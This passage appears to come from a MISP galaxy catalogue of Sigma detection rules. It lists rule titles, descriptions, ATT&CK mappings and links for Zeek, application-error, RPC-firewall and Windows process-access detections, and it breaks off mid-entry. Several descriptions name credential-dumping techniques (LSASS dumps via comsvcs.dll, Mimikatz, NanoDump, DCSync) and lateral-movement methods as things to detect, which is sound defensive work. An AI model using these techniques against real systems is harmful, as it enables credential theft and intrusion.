https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml

New Kind of Network (NKN) Detection

NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>

The tag is: misp-galaxy:sigma-rules="New Kind of Network (NKN) Detection"

Table 8873. Table References

Links

https://github.com/Maka8ka/NGLite

https://github.com/nknorg/nkn-sdk-go

https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml

MITRE BZAR Indicators for Persistence

Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.

The tag is: misp-galaxy:sigma-rules="MITRE BZAR Indicators for Persistence"

MITRE BZAR Indicators for Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"

Table 8874. Table References

Links

https://github.com/mitre-attack/bzar#indicators-for-attck-persistence

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml

SMB Spoolss Name Piped Usage

Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.

The tag is: misp-galaxy:sigma-rules="SMB Spoolss Name Piped Usage"

SMB Spoolss Name Piped Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8875. Table References

Links

https://dirkjanm.io/a-different-way-of-abusing-zerologon/

https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1

https://twitter.com/_dirkjan/status/1309214379003588608

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml

Identifies clients that may be performing DNS lookups associated with common currency mining pools.

The tag is: misp-galaxy:sigma-rules="DNS Events Related To Mining Pools"

DNS Events Related To Mining Pools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

Table 8876. Table References

Links

https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml

Possible PrintNightmare Print Driver Install

Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.

The tag is: misp-galaxy:sigma-rules="Possible PrintNightmare Print Driver Install"

Table 8877. Table References

Links

https://github.com/corelight/CVE-2021-1675

https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/

https://old.zeek.org/zeekweek2019/slides/bzar.pdf

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29

https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml

Suspicious Access to Sensitive File Extensions - Zeek

Detects known sensitive file extensions via Zeek

The tag is: misp-galaxy:sigma-rules="Suspicious Access to Sensitive File Extensions - Zeek"

Table 8878. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml

First Time Seen Remote Named Pipe - Zeek

This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes

The tag is: misp-galaxy:sigma-rules="First Time Seen Remote Named Pipe - Zeek"

First Time Seen Remote Named Pipe - Zeek has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8879. Table References

Links

https://twitter.com/menasec1/status/1104489274387451904

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml

Transferring Files with Credential Data via Network Shares - Zeek

Transferring files with well-known filenames (sensitive files with credential data) using network shares

The tag is: misp-galaxy:sigma-rules="Transferring Files with Credential Data via Network Shares - Zeek"

Transferring Files with Credential Data via Network Shares - Zeek has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 8880. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml

Suspicious DNS Z Flag Bit Set

The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'

The tag is: misp-galaxy:sigma-rules="Suspicious DNS Z Flag Bit Set"

Suspicious DNS Z Flag Bit Set has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 8881. Table References

Links

https://tools.ietf.org/html/rfc2929#section-2.1

https://twitter.com/neu5ron/status/1346245602502443009

https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS

https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml

Django Framework Exceptions

Detects suspicious Django web application framework exceptions that could indicate exploitation attempts

The tag is: misp-galaxy:sigma-rules="Django Framework Exceptions"

Django Framework Exceptions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8882. Table References

Links

https://docs.djangoproject.com/en/1.11/topics/logging/#django-security

https://docs.djangoproject.com/en/1.11/ref/exceptions/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml

Potential RCE Exploitation Attempt In NodeJS

Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability.

The tag is: misp-galaxy:sigma-rules="Potential RCE Exploitation Attempt In NodeJS"

Potential RCE Exploitation Attempt In NodeJS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8883. Table References

Links

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://github.com/SigmaHQ/sigma/tree/master/rules/application/nodejs/nodejs_rce_exploitation_attempt.yml

Spring Framework Exceptions

Detects suspicious Spring framework exceptions that could indicate exploitation attempts

The tag is: misp-galaxy:sigma-rules="Spring Framework Exceptions"

Spring Framework Exceptions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8884. Table References

Links

https://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html

https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/spring_application_exceptions.yml

Potential SpEL Injection In Spring Framework

Detects potential SpEL Injection exploitation, which may lead to RCE.

The tag is: misp-galaxy:sigma-rules="Potential SpEL Injection In Spring Framework"

Potential SpEL Injection In Spring Framework has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8885. Table References

Links

https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/spring_spel_injection.yml

Python SQL Exceptions

Generic rule for SQL exceptions in Python according to PEP 249

The tag is: misp-galaxy:sigma-rules="Python SQL Exceptions"

Python SQL Exceptions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8886. Table References

Links

https://www.python.org/dev/peps/pep-0249/#exceptions

https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml

Potential OGNL Injection Exploitation In JVM Based Application

Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the reason for some high profile RCE’s such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)

The tag is: misp-galaxy:sigma-rules="Potential OGNL Injection Exploitation In JVM Based Application"

Potential OGNL Injection Exploitation In JVM Based Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8887. Table References

Links

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_ognl_injection_exploitation_attempt.yml

Potential Local File Read Vulnerability In JVM Based Application

Detects potential local file read vulnerability in JVM based apps. If the exceptions are caused due to user input and contain path traversal payloads then it’s a red flag.

The tag is: misp-galaxy:sigma-rules="Potential Local File Read Vulnerability In JVM Based Application"

Potential Local File Read Vulnerability In JVM Based Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8888. Table References

Links

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_local_file_read.yml

Process Execution Error In JVM Based Application

Detects process execution related exceptions in JVM based apps, often relates to RCE

The tag is: misp-galaxy:sigma-rules="Process Execution Error In JVM Based Application"

Process Execution Error In JVM Based Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8889. Table References

Links

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_rce_exploitation_attempt.yml

Potential XXE Exploitation Attempt In JVM Based Application

Detects XML parsing issues, if the application expects to work with XML make sure that the parser is initialized safely.

The tag is: misp-galaxy:sigma-rules="Potential XXE Exploitation Attempt In JVM Based Application"

Potential XXE Exploitation Attempt In JVM Based Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8890. Table References

Links

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://owasp.org/www-community/vulnerabilities/XML_External_Entity(XXE)_Processing

https://rules.sonarsource.com/java/RSPEC-2755

https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_xxe_exploitation_attempt.yml

Potential JNDI Injection Exploitation In JVM Based Application

Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation.

The tag is: misp-galaxy:sigma-rules="Potential JNDI Injection Exploitation In JVM Based Application"

Potential JNDI Injection Exploitation In JVM Based Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8891. Table References

Links

https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_jndi_injection_exploitation_attempt.yml

Suspicious SQL Error Messages

Detects SQL error messages that indicate probing for an injection attack

The tag is: misp-galaxy:sigma-rules="Suspicious SQL Error Messages"

Suspicious SQL Error Messages has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8892. Table References

Links

http://www.sqlinjection.net/errors

https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml

Ruby on Rails Framework Exceptions

Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts

The tag is: misp-galaxy:sigma-rules="Ruby on Rails Framework Exceptions"

Ruby on Rails Framework Exceptions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8893. Table References

Links

https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb

http://edgeguides.rubyonrails.org/security.html

https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception

http://guides.rubyonrails.org/action_controller_overview.html

https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml

SharpHound Recon Account Discovery

Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.

The tag is: misp-galaxy:sigma-rules="SharpHound Recon Account Discovery"

SharpHound Recon Account Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 8894. Table References

Links

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3

https://github.com/zeronetworks/rpcfirewall

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml

Remote Server Service Abuse for Lateral Movement

Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR

The tag is: misp-galaxy:sigma-rules="Remote Server Service Abuse for Lateral Movement"

Remote Server Service Abuse for Lateral Movement has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8897. Table References

Links

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml

Remote Schedule Task Lateral Movement via ATSvc

Detects remote RPC calls to create or execute a scheduled task via ATSvc

The tag is: misp-galaxy:sigma-rules="Remote Schedule Task Lateral Movement via ATSvc"

Remote Schedule Task Lateral Movement via ATSvc has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 8898. Table References

Links

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml

Possible DCSync Attack

Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.

The tag is: misp-galaxy:sigma-rules="Possible DCSync Attack"

Possible DCSync Attack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 8899. Table References

Links

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml

Remote Event Log Recon

Detects remote RPC calls to get event log information via EVEN or EVEN6

The tag is: misp-galaxy:sigma-rules="Remote Event Log Recon"

Table 8900. Table References

Links

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml

Remote Schedule Task Lateral Movement via ITaskSchedulerService

Detects remote RPC calls to create or execute a scheduled task

The tag is: misp-galaxy:sigma-rules="Remote Schedule Task Lateral Movement via ITaskSchedulerService"

Remote Schedule Task Lateral Movement via ITaskSchedulerService has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 8901. Table References

Links

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml

Remote DCOM/WMI Lateral Movement

Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.

The tag is: misp-galaxy:sigma-rules="Remote DCOM/WMI Lateral Movement"

Remote DCOM/WMI Lateral Movement has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 8902. Table References

Links

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml

Remote Schedule Task Lateral Movement via SASec

Detects remote RPC calls to create or execute a scheduled task via SASec

The tag is: misp-galaxy:sigma-rules="Remote Schedule Task Lateral Movement via SASec"

Remote Schedule Task Lateral Movement via SASec has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 8903. Table References

Links

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml

SharpHound Recon Sessions

Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.

The tag is: misp-galaxy:sigma-rules="SharpHound Recon Sessions"

SharpHound Recon Sessions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 8905. Table References

Links

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml

Remote Registry Lateral Movement

Detects remote RPC calls to modify the registry and possible execute code

The tag is: misp-galaxy:sigma-rules="Remote Registry Lateral Movement"

Remote Registry Lateral Movement has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 8908. Table References

Links

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78

https://github.com/zeronetworks/rpcfirewall

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml

Potential Server Side Template Injection In Velocity

Detects exceptions in velocity template renderer, this most likely happens due to dynamic rendering of user input and may lead to RCE.

The tag is: misp-galaxy:sigma-rules="Potential Server Side Template Injection In Velocity"

Potential Server Side Template Injection In Velocity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8911. Table References

Links

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://antgarsil.github.io/posts/velocity/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/velocity/velocity_ssti_injection.yml

Credential Dumping Attempt Via Svchost

Detects when a process tries to access the memory of svchost to potentially dump credentials.

The tag is: misp-galaxy:sigma-rules="Credential Dumping Attempt Via Svchost"

Credential Dumping Attempt Via Svchost has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 8912. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_credential_dumping.yml

Remote LSASS Process Access Through Windows Remote Management

Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.

The tag is: misp-galaxy:sigma-rules="Remote LSASS Process Access Through Windows Remote Management"

Remote LSASS Process Access Through Windows Remote Management has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 8913. Table References

Links

https://pentestlab.blog/2018/05/15/lateral-movement-winrm/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml

Lsass Memory Dump via Comsvcs DLL

Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.

The tag is: misp-galaxy:sigma-rules="Lsass Memory Dump via Comsvcs DLL"

Lsass Memory Dump via Comsvcs DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8914. Table References

Links

https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/

https://twitter.com/shantanukhande/status/1229348874298388484

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml

CMSTP Execution Process Access

Detects various indicators of Microsoft Connection Manager Profile Installer execution

The tag is: misp-galaxy:sigma-rules="CMSTP Execution Process Access"

CMSTP Execution Process Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"

Table 8915. Table References

Links

https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml

HackTool - Generic Process Access

Detects process access requests from hacktool processes based on their default image name

The tag is: misp-galaxy:sigma-rules="HackTool - Generic Process Access"

HackTool - Generic Process Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8916. Table References

Links

https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html

https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_generic_access.yml

Credential Dumping Attempt Via WerFault

Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.

The tag is: misp-galaxy:sigma-rules="Credential Dumping Attempt Via WerFault"

Credential Dumping Attempt Via WerFault has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8917. Table References

Links

https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml

Potential Direct Syscall of NtOpenProcess

Detects potential calls to NtOpenProcess directly from NTDLL.

The tag is: misp-galaxy:sigma-rules="Potential Direct Syscall of NtOpenProcess"

Potential Direct Syscall of NtOpenProcess has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

Table 8918. Table References

Links

https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml

Suspicious LSASS Access Via MalSecLogon

Detects suspicious access to LSASS handle via a call trace to "seclogon.dll" with a suspicious access right.

The tag is: misp-galaxy:sigma-rules="Suspicious LSASS Access Via MalSecLogon"

Suspicious LSASS Access Via MalSecLogon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8919. Table References

Links

https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml

https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html

https://twitter.com/SBousseaden/status/1541920424635912196

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_seclogon_access.yml

Suspicious Svchost Process Access

Detects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.

The tag is: misp-galaxy:sigma-rules="Suspicious Svchost Process Access"

Suspicious Svchost Process Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 8920. Table References

Links

https://github.com/hlldz/Invoke-Phant0m

https://twitter.com/timbmsft/status/900724491076214784

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_susp_access_request.yml

UAC Bypass Using WOW64 Logger DLL Hijack

Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using WOW64 Logger DLL Hijack"

UAC Bypass Using WOW64 Logger DLL Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 8921. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml

Potential Shellcode Injection

Detects potential shellcode injection used by tools such as Metasploit’s migrate and Empire’s psinject

